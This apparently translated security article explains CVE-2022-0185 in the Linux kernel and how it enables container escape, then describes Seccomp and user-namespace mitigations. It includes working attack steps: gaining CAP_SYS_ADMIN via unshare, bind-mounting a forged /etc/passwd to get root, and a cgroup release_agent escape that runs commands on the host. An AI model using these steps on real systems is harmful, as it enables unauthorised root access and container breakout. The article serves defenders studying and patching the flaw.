On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow in the legacy_parse_param function of the Linux kernel's file system context code, affecting kernel 5.1-rc1 and later. The vulnerability is tracked as CVE-2022-0185 and is rated high risk, with a severity score of 7.8.

The vulnerability allows out-of-bounds writes in kernel memory. An unprivileged attacker could use it to bypass the restrictions of any Linux namespace and elevate privileges to root. For example, an attacker who has infiltrated your container could escape from it and elevate privileges.

This vulnerability was introduced in March 2019 in Linux kernel 5.1-rc1. A patch was released on January 18 to fix the issue, and all Linux users are advised to download and install the latest kernel version.

Vulnerability details

The vulnerability is caused by an integer underflow in the legacy_parse_param function of the file system context code (fs/fs_context.c). The file system context is used to create superblocks when mounting and remounting file systems; a superblock records a file system’s characteristics, such as block and file sizes and storage blocks.

By passing 4095 bytes or more of input to the legacy_parse_param function, it is possible to bypass the input length check and cause an out-of-bounds write, triggering the vulnerability. An attacker could use this to overwrite other parts of kernel memory, causing a system crash or executing arbitrary code to elevate privileges.
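
The underflow can be reproduced with plain arithmetic. The sketch below is a Python model, not kernel code: it assumes a 4096-byte page and a 64-bit unsigned size, and it mirrors the publicly documented pre-patch check `len > PAGE_SIZE - 2 - size` next to the patched form `size + len + 2 > PAGE_SIZE`. The function names are made up for illustration.

```python
PAGE_SIZE = 4096            # assumed page size
U64_MASK = (1 << 64) - 1    # models a 64-bit unsigned size_t


def vulnerable_check_rejects(size, length):
    """Model of the pre-patch check: len > PAGE_SIZE - 2 - size (unsigned)."""
    limit = (PAGE_SIZE - 2 - size) & U64_MASK  # wraps around once size >= 4095
    return length > limit


def patched_check_rejects(size, length):
    """Model of the patched check: size + len + 2 > PAGE_SIZE (no subtraction)."""
    return size + length + 2 > PAGE_SIZE


if __name__ == "__main__":
    # size is the number of bytes already accumulated in the legacy data buffer.
    for size in (4000, 4094, 4095):
        print(size,
              vulnerable_check_rejects(size, 100),
              patched_check_rejects(size, 100))
```

With 4095 bytes already accumulated, the modelled pre-patch limit wraps to a huge unsigned value, so a further 100 bytes are accepted; the patched form rejects them.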

The input data for the legacy_parse_param function is added via the fsconfig system call to configure the file system creation context (e.g., an ext4 file system superblock).

// Use the fsconfig system call to add the NUL-terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, an unprivileged user must hold at least the CAP_SYS_ADMIN capability in their current namespace. This means that access to any namespace in which the user holds this capability is sufficient to exploit the vulnerability.

If an unprivileged user does not have CAP_SYS_ADMIN, an attacker can obtain it with the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. unshare lets a process create new namespaces, here a mount namespace and a user namespace, and the process holds the necessary capabilities inside them to carry out further attacks. This technique matters for Kubernetes and the rest of the container world, which use Linux namespaces to isolate Pods. An attacker can use it in a container escape attack; once successful, the attacker gains full control over the host OS and all containers running on it, and can go on to attack other machines on the internal network segment or even deploy malicious containers in a Kubernetes cluster.
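
As a rough illustration of the unshare step, the sketch below calls unshare(2) through ctypes from Python and prints the effective capability mask before and after. It assumes a Linux host with glibc and uses the flag values from <sched.h>; the helper names try_unshare and effective_caps are hypothetical. Whether the call succeeds depends on the host's user namespace settings and on any Seccomp filter in effect.

```python
import ctypes
import errno
import os

CLONE_NEWNS = 0x00020000    # new mount namespace (value from <sched.h>)
CLONE_NEWUSER = 0x10000000  # new user namespace (value from <sched.h>)


def try_unshare(flags):
    """Call unshare(2); return 0 on success or the errno value on failure."""
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.unshare(ctypes.c_int(flags)) == 0:
        return 0
    return ctypes.get_errno()


def effective_caps():
    """Read the effective capability mask (CapEff) of this process."""
    with open("/proc/self/status") as status:
        for line in status:
            if line.startswith("CapEff:"):
                return int(line.split()[1], 16)
    raise RuntimeError("CapEff not found in /proc/self/status")


if __name__ == "__main__":
    print("CapEff before: %#x" % effective_caps())
    err = try_unshare(CLONE_NEWUSER | CLONE_NEWNS)
    if err:
        print("unshare failed:", errno.errorcode.get(err, err), os.strerror(err))
    else:
        print("CapEff after:  %#x" % effective_caps())
```

On a host where the call is blocked, the script reports the error instead of a new capability mask.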

The research team that discovered the vulnerability posted code and a proof of concept to exploit it on GitHub on January 25.

PoC

Docker and other container runtimes apply a Seccomp profile by default, which prevents processes in the container from using dangerous system calls and protects Linux namespace boundaries.

Seccomp (full name: secure computing mode) was introduced to the Linux kernel in version 2.6.12 (March 8, 2005). Initially it was a strict whitelist: a process in this mode could use only four system calls, read, write, _exit, and sigreturn, on file descriptors that were already open. If the process attempted any other system call, the kernel terminated it with SIGKILL or SIGSYS.

However, Kubernetes does not apply any Seccomp or AppArmor/SELinux profile to Pods by default. This is dangerous: processes in Pods can freely use dangerous system calls and obtain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.

Let’s start with a Docker example. In a standard Docker environment the unshare command does not work, because Docker’s Seccomp filter blocks the system call it uses.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now let’s look at a Kubernetes Pod.

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

You can see that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it with the unshare command.
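
The capability list that pscap prints is a decoded bitmask. As a sketch, the Python snippet below decodes such a mask using the bit numbers from <linux/capability.h>. The mask 0xa80425fb is an assumed example that corresponds to the fourteen capabilities listed above, and the function names are illustrative.

```python
# Capability names indexed by bit number, as defined in <linux/capability.h>.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]


def decode_caps(mask):
    """Return the names of all capabilities whose bit is set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def has_cap(mask, name):
    """Return True if the named capability is present in mask."""
    return name in decode_caps(mask)


if __name__ == "__main__":
    example_mask = 0xa80425fb  # assumed example mask
    print(", ".join(decode_caps(example_mask)))
    print("sys_admin present:", has_cap(example_mask, "sys_admin"))
```

A mask can be taken from the CapEff line of /proc/<pid>/status for any process you want to inspect.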

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

So what can you do with CAP_SYS_ADMIN? Here are two examples to show how CAP_SYS_ADMIN can be used to infiltrate a system.

Normal user elevated to root user

The following procedure can be used to elevate a normal user on the host directly to the root user.

First, give python3 the CAP_SYS_ADMIN capability (note that setcap cannot operate on symbolic links, only on the original file).

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a normal user.

$ useradd test -d /home/test -m

Then switch to the normal user and go to the user home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and, in the copy, change the root user’s password to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
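
The manual edit above can also be scripted. The following Python sketch replaces the password field of one account in passwd-format text; the helper name set_password_field is hypothetical and the sample input is illustrative.

```python
def set_password_field(passwd_text, user, new_field):
    """Return passwd-format text with the second field of `user` replaced."""
    out = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # passwd entries look like name:password:uid:gid:gecos:home:shell
        if len(fields) >= 2 and fields[0] == user:
            fields[1] = new_field
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    sample = (
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    )
    print(set_password_field(sample, "root", "$1$abc$BXBqpb9BZcZhXLgbee.0s/"), end="")
```

Only the matching account line is changed; every other line is passed through untouched.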

Bind-mount the modified passwd file over /etc/passwd.

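# cat mount-passwd.py
import ctypes
import os

# Load libc with errno support so a failed mount(2) can be reported.
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                       ctypes.c_ulong, ctypes.c_char_p)
libc.mount.restype = ctypes.c_int

MS_BIND = 4096  # bind mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"

# For a bind mount, the filesystem type and data arguments are ignored.
if libc.mount(source, target, b"none", MS_BIND, b"rw") != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))

Run the script:
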
$ python3 mount-passwd.py

Now for the moment to witness the miracle! Switch directly to the root user and enter the password “password”.

$ su root
Password:
root@coredns:/home/test#

Amazing, I’ve switched to the root user.

Let’s check that we really have root privileges.

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Well, it’s root, that’s right.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

So, System Reboot Engineers, check whether the normal user accounts you hand out to others have the CAP_SYS_ADMIN capability!

View all processes on the host in a container

Let’s look at another container example. The following magic operation allows you to get all the processes running on the host in a container.

We don’t need the --privileged argument to run a privileged container; that would be pointless.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following command in the container. The final effect is to execute the ps aux command on the host and save its output to the /output file in the container.

# Mounts the RDMA cgroup controller and creates a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist",
# your setup doesn't have the RDMA cgroup controller; try changing rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
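
The sed expression in the script extracts the container's OverlayFS upperdir from /etc/mtab. A Python sketch of the same extraction is shown here; the function name and the sample mount line are made up for illustration.

```python
import re


def overlay_upperdir(mtab_text):
    """Return the value of the first upperdir= mount option, or None."""
    for line in mtab_text.splitlines():
        # Mount options are comma-separated; the value ends at ',' or whitespace.
        match = re.search(r"upperdir=([^,\s]*)", line)
        if match:
            return match.group(1)
    return None


if __name__ == "__main__":
    # Hypothetical mtab entry for a container's root filesystem.
    sample = (
        "overlay / overlay rw,relatime,"
        "lowerdir=/var/lib/docker/overlay2/l/ABC,"
        "upperdir=/var/lib/docker/overlay2/abc/diff,"
        "workdir=/var/lib/docker/overlay2/abc/work 0 0\n"
    )
    print(overlay_upperdir(sample))
```

The returned path is where the container's writable layer lives on the host, which is why the script can point release_agent at a file created inside the container.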

In the end, you can see all the processes running on the host from inside the container.

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I will not explain the specific meaning of these commands here; if you are interested, you can work through them using the comments.

What is certain is that the CAP_SYS_ADMIN capability opens up more possibilities for attackers, both on the host and in containers, and especially in container environments. If we cannot upgrade the kernel for reasons beyond our control, we should look for other solutions.

Solutions

Container level

Since v1.22, Kubernetes has been able to use SecurityContext to apply a default Seccomp or AppArmor profile to resource objects such as Pods, Deployments, StatefulSets, and DaemonSets. While this feature is currently in Alpha, users can already add their own Seccomp or AppArmor profile and reference it in SecurityContext.

Example.

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to use unshare to obtain the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call is successfully blocked and the attacker cannot use this capability to attack.
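
To check manifests for this setting before they are deployed, something like the following Python sketch could be used. It assumes the Pod manifest has already been loaded into a dictionary (for example with a YAML parser), the function name is hypothetical, and it only looks at spec.securityContext and spec.containers[].securityContext, ignoring init and ephemeral containers.

```python
def containers_without_seccomp(pod):
    """Return names of containers with no Seccomp profile or an Unconfined one."""
    spec = pod.get("spec") or {}
    pod_context = spec.get("securityContext") or {}
    pod_type = (pod_context.get("seccompProfile") or {}).get("type")

    unprotected = []
    for container in spec.get("containers") or []:
        context = container.get("securityContext") or {}
        profile = context.get("seccompProfile") or {}
        # A container-level profile overrides the Pod-level one.
        effective = profile.get("type", pod_type)
        if effective in (None, "Unconfined"):
            unprotected.append(container.get("name"))
    return unprotected


if __name__ == "__main__":
    protected = {
        "spec": {
            "containers": [{
                "name": "protected",
                "image": "ubuntu",
                "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
            }]
        }
    }
    print(containers_without_seccomp(protected))
```

An empty result means every regular container in the manifest has some Seccomp profile other than Unconfined.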

Host level

Another option is to disable user namespaces for unprivileged users at the host level, which does not require rebooting the system. On Ubuntu, for example, the following two lines are all you need: the change takes effect immediately and persists across reboots.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

If you are on a Red Hat system, you can run the following commands to achieve the same result.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
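
To confirm that the setting is in effect, the two sysctls can be read back from /proc/sys. The Python sketch below does this; the function names are hypothetical, the proc_sys parameter exists only to make the helper easy to point at a test directory, and a sysctl that does not exist on a given distribution is reported as None.

```python
import os


def userns_settings(proc_sys="/proc/sys"):
    """Return the two user-namespace sysctls as ints (None if absent)."""
    paths = {
        "kernel.unprivileged_userns_clone": "kernel/unprivileged_userns_clone",
        "user.max_user_namespaces": "user/max_user_namespaces",
    }
    values = {}
    for name, rel in paths.items():
        try:
            with open(os.path.join(proc_sys, rel)) as handle:
                values[name] = int(handle.read().strip())
        except (OSError, ValueError):
            values[name] = None
    return values


def unprivileged_userns_disabled(values):
    """True if either sysctl is set to 0, as in the commands above."""
    return (values.get("kernel.unprivileged_userns_clone") == 0
            or values.get("user.max_user_namespaces") == 0)


if __name__ == "__main__":
    settings = userns_settings()
    print(settings)
    print("unprivileged user namespaces disabled:",
          unprivileged_userns_disabled(settings))
```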

To summarize, here are the recommendations for handling the vulnerability:

  • If your environment can tolerate patching the kernel and rebooting the system, it is best to apply the patch or upgrade the kernel.
  • Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
  • For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce the risk. Docker does this by default; Kubernetes requires additional action.
  • In the future, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. This feature is currently in Alpha and needs to be enabled via a feature gate.
  • Disable user namespaces for unprivileged users at the host level.

Lastly

Container environments are complex, especially distributed scheduling platforms like Kubernetes. Each component has its own lifecycle and attack surface and can easily expose security risks, so container cluster administrators must pay attention to every security detail. In the vast majority of cases, container security depends on the security of the Linux kernel, so we need to keep an eye on kernel security issues and implement the corresponding fixes as soon as possible.

References